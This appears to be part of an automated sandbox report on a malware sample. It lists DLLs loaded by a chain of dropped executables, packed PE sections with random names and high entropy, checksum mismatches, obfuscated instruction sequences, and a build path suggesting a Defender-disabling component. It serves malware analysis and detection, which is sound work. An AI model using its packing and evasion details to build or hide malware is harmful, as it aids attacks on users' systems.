Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Section loaded: msvcr100.dll
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1013608001\ba17bbfb21.exe Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\1013608001\ba17bbfb21.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1013608001\ba17bbfb21.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1013608001\ba17bbfb21.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\1013608001\ba17bbfb21.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1013608001\ba17bbfb21.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013608001\ba17bbfb21.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1013608001\ba17bbfb21.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1013608001\ba17bbfb21.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1013608001\ba17bbfb21.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1013608001\ba17bbfb21.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1013608001\ba17bbfb21.exe Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013608001\ba17bbfb21.exe Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013608001\ba17bbfb21.exe Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1013608001\ba17bbfb21.exe Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013608001\ba17bbfb21.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1013608001\ba17bbfb21.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013608001\ba17bbfb21.exe Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1013608001\ba17bbfb21.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1013608001\ba17bbfb21.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1013608001\ba17bbfb21.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1013608001\ba17bbfb21.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1013609001\734386a52c.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1013609001\734386a52c.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1013609001\734386a52c.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1013609001\734386a52c.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1013609001\734386a52c.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\1013609001\734386a52c.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1013609001\734386a52c.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1013609001\734386a52c.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1013609001\734386a52c.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1013609001\734386a52c.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32
Source: Window Recorder Window detected: More than 3 window changes detected
Source: file.exe Static file information: File size 3296768 > 1048576
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe File opened: C:\Windows\SysWOW64\msvcr100.dll
Source: file.exe Static PE information: Raw size of frfapimt is bigger than: 0x100000 < 0x2b9200
Source: Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: 734386a52c.exe, 0000001E.00000002.3260064307.0000000000AB2000.00000040.00000001.01000000.00000014.sdmp, 734386a52c.exe, 0000001E.00000003.3184731936.00000000048A0000.00000004.00001000.00020000.00000000.sdmp

Data Obfuscation

Source: C:\Users\user\Desktop\file.exe Unpacked PE file: 0.2.file.exe.a90000.0.unpack :EW;.rsrc:W;.idata :W;frfapimt:EW;qtisgtef:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;frfapimt:EW;qtisgtef:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Unpacked PE file: 2.2.skotes.exe.1f0000.0.unpack :EW;.rsrc:W;.idata :W;frfapimt:EW;qtisgtef:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;frfapimt:EW;qtisgtef:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Unpacked PE file: 3.2.skotes.exe.1f0000.0.unpack :EW;.rsrc:W;.idata :W;frfapimt:EW;qtisgtef:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;frfapimt:EW;qtisgtef:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Unpacked PE file: 6.2.skotes.exe.1f0000.0.unpack :EW;.rsrc:W;.idata :W;frfapimt:EW;qtisgtef:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;frfapimt:EW;qtisgtef:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Unpacked PE file: 7.2.4611cc433b.exe.400000.0.unpack :EW;.rsrc:W;.idata :W; :EW;whvqijov:EW;ikwniflt:EW;.taggant:EW; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Unpacked PE file: 8.2.79ddad050f.exe.370000.0.unpack :EW;.rsrc:W;.idata :W; :EW;sbjgrbkb:EW;biqspjfj:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;sbjgrbkb:EW;biqspjfj:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Unpacked PE file: 9.2.e051bdf457.exe.250000.0.unpack :EW;.rsrc:W;.idata :W; :EW;dnuvwdxn:EW;nviifddd:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;dnuvwdxn:EW;nviifddd:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Unpacked PE file: 10.2.79ddad050f.exe.370000.0.unpack :EW;.rsrc:W;.idata :W; :EW;sbjgrbkb:EW;biqspjfj:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;sbjgrbkb:EW;biqspjfj:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Unpacked PE file: 29.2.e051bdf457.exe.250000.0.unpack :EW;.rsrc:W;.idata :W; :EW;dnuvwdxn:EW;nviifddd:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;dnuvwdxn:EW;nviifddd:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1013609001\734386a52c.exe Unpacked PE file: 30.2.734386a52c.exe.ab0000.0.unpack :EW;.rsrc:W;.idata :W;pzmyaaxr:EW;wkcwmztw:EW;.taggant:EW; vs :ER;.rsrc:W;
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
Source: random[1].exe.6.dr Static PE information: real checksum: 0x1f17a6 should be: 0x1ed21e
Source: 4611cc433b.exe.6.dr Static PE information: real checksum: 0x1f17a6 should be: 0x1ed21e
Source: random[1].exe1.6.dr Static PE information: real checksum: 0x1c274a should be: 0x1b8d69
Source: 79ddad050f.exe.6.dr Static PE information: real checksum: 0x1c06e1 should be: 0x1c72fd
Source: e051bdf457.exe.6.dr Static PE information: real checksum: 0x1c274a should be: 0x1b8d69
Source: file.exe Static PE information: real checksum: 0x32fb32 should be: 0x3328f6
Source: 734386a52c.exe.6.dr Static PE information: real checksum: 0x2b049b should be: 0x2afad6
Source: skotes.exe.0.dr Static PE information: real checksum: 0x32fb32 should be: 0x3328f6
Source: random[1].exe0.6.dr Static PE information: real checksum: 0x1c06e1 should be: 0x1c72fd
Source: random[2].exe.6.dr Static PE information: real checksum: 0x2b049b should be: 0x2afad6
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .idata
Source: file.exe Static PE information: section name: frfapimt
Source: file.exe Static PE information: section name: qtisgtef
Source: file.exe Static PE information: section name: .taggant
Source: skotes.exe.0.dr Static PE information: section name:
Source: skotes.exe.0.dr Static PE information: section name: .idata
Source: skotes.exe.0.dr Static PE information: section name: frfapimt
Source: skotes.exe.0.dr Static PE information: section name: qtisgtef
Source: skotes.exe.0.dr Static PE information: section name: .taggant
Source: random[1].exe.6.dr Static PE information: section name:
Source: random[1].exe.6.dr Static PE information: section name: .idata
Source: random[1].exe.6.dr Static PE information: section name:
Source: random[1].exe.6.dr Static PE information: section name: whvqijov
Source: random[1].exe.6.dr Static PE information: section name: ikwniflt
Source: random[1].exe.6.dr Static PE information: section name: .taggant
Source: 4611cc433b.exe.6.dr Static PE information: section name:
Source: 4611cc433b.exe.6.dr Static PE information: section name: .idata
Source: 4611cc433b.exe.6.dr Static PE information: section name:
Source: 4611cc433b.exe.6.dr Static PE information: section name: whvqijov
Source: 4611cc433b.exe.6.dr Static PE information: section name: ikwniflt
Source: 4611cc433b.exe.6.dr Static PE information: section name: .taggant
Source: random[1].exe0.6.dr Static PE information: section name:
Source: random[1].exe0.6.dr Static PE information: section name: .idata
Source: random[1].exe0.6.dr Static PE information: section name:
Source: random[1].exe0.6.dr Static PE information: section name: sbjgrbkb
Source: random[1].exe0.6.dr Static PE information: section name: biqspjfj
Source: random[1].exe0.6.dr Static PE information: section name: .taggant
Source: 79ddad050f.exe.6.dr Static PE information: section name:
Source: 79ddad050f.exe.6.dr Static PE information: section name: .idata
Source: 79ddad050f.exe.6.dr Static PE information: section name:
Source: 79ddad050f.exe.6.dr Static PE information: section name: sbjgrbkb
Source: 79ddad050f.exe.6.dr Static PE information: section name: biqspjfj
Source: 79ddad050f.exe.6.dr Static PE information: section name: .taggant
Source: random[1].exe1.6.dr Static PE information: section name:
Source: random[1].exe1.6.dr Static PE information: section name: .idata
Source: random[1].exe1.6.dr Static PE information: section name:
Source: random[1].exe1.6.dr Static PE information: section name: dnuvwdxn
Source: random[1].exe1.6.dr Static PE information: section name: nviifddd
Source: random[1].exe1.6.dr Static PE information: section name: .taggant
Source: e051bdf457.exe.6.dr Static PE information: section name:
Source: e051bdf457.exe.6.dr Static PE information: section name: .idata
Source: e051bdf457.exe.6.dr Static PE information: section name:
Source: e051bdf457.exe.6.dr Static PE information: section name: dnuvwdxn
Source: e051bdf457.exe.6.dr Static PE information: section name: nviifddd
Source: e051bdf457.exe.6.dr Static PE information: section name: .taggant
Source: random[2].exe.6.dr Static PE information: section name:
Source: random[2].exe.6.dr Static PE information: section name: .idata
Source: random[2].exe.6.dr Static PE information: section name: pzmyaaxr
Source: random[2].exe.6.dr Static PE information: section name: wkcwmztw
Source: random[2].exe.6.dr Static PE information: section name: .taggant
Source: 734386a52c.exe.6.dr Static PE information: section name:
Source: 734386a52c.exe.6.dr Static PE information: section name: .idata
Source: 734386a52c.exe.6.dr Static PE information: section name: pzmyaaxr
Source: 734386a52c.exe.6.dr Static PE information: section name: wkcwmztw
Source: 734386a52c.exe.6.dr Static PE information: section name: .taggant
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00AAD91C push ecx; ret 0_2_00AAD92F
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00AA1359 push es; ret 0_2_00AA135A
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 2_2_0020D91C push ecx; ret 2_2_0020D92F
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 3_2_0020D91C push ecx; ret 3_2_0020D92F
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_0020D91C push ecx; ret 6_2_0020D92F
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_0020DFC6 push ecx; ret 6_2_0020DFD9
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: 7_3_04D195F7 push ecx; ret 7_3_04D1960A
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: 7_3_04D3037D push esi; ret 7_3_04D30386
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: 7_2_0040A1F7 push ecx; ret 7_2_0040A20A
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: 7_2_00421B7D push esi; ret 7_2_00421B86
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: 7_2_1000E891 push ecx; ret 7_2_1000E8A4
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: 7_2_0099A491 push eax; mov dword ptr [esp], esi 7_2_0099A52B
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: 7_2_0099A491 push eax; mov dword ptr [esp], edx 7_2_0099A54A
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: 7_2_0099A491 push 2880708Ch; mov dword ptr [esp], edx 7_2_0099A601
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: 7_2_0099A491 push edi; mov dword ptr [esp], ebx 7_2_0099A623
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: 7_2_0099A491 push eax; mov dword ptr [esp], ebx 7_2_0099A67C
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: 7_2_0099A491 push edx; mov dword ptr [esp], esi 7_2_0099A692
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: 7_2_0099A491 push ecx; mov dword ptr [esp], 7BE5345Bh 7_2_0099A706
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: 7_2_0099A491 push ebp; mov dword ptr [esp], ebx 7_2_0099A73B
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: 7_2_0099A491 push 2AD25EA1h; mov dword ptr [esp], esi 7_2_0099A7EC
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: 7_2_0099A491 push edi; mov dword ptr [esp], 7FFF4CD9h 7_2_0099A896
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: 7_2_0099A491 push 31F95A20h; mov dword ptr [esp], eax 7_2_0099A91F
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: 7_2_0099A491 push eax; mov dword ptr [esp], 4A49C712h 7_2_0099A94D
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: 7_2_0099A491 push edx; mov dword ptr [esp], 0FFE31AAh 7_2_0099AA7B
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: 7_2_0099A491 push ecx; mov dword ptr [esp], 4F8C644Ah 7_2_0099AADC
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: 7_2_0099A491 push 2418A2A2h; mov dword ptr [esp], edx 7_2_0099AB22
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: 7_2_0099A491 push 7DD601E9h; mov dword ptr [esp], esi 7_2_0099ABBB
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: 7_2_0099A491 push ecx; mov dword ptr [esp], ebx 7_2_0099ABE9
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: 7_2_0099A491 push esi; mov dword ptr [esp], ebp 7_2_0099AC20
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: 7_2_0099A491 push ebx; mov dword ptr [esp], edi 7_2_0099AC7D
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: 7_2_0099A491 push 0F59DBE4h; mov dword ptr [esp], ecx 7_2_0099ACA0
Source: file.exe Static PE information: section name: entropy: 7.092808136704337
Source: skotes.exe.0.dr Static PE information: section name: entropy: 7.092808136704337
Source: random[1].exe.6.dr Static PE information: section name: whvqijov entropy: 7.941395599436267
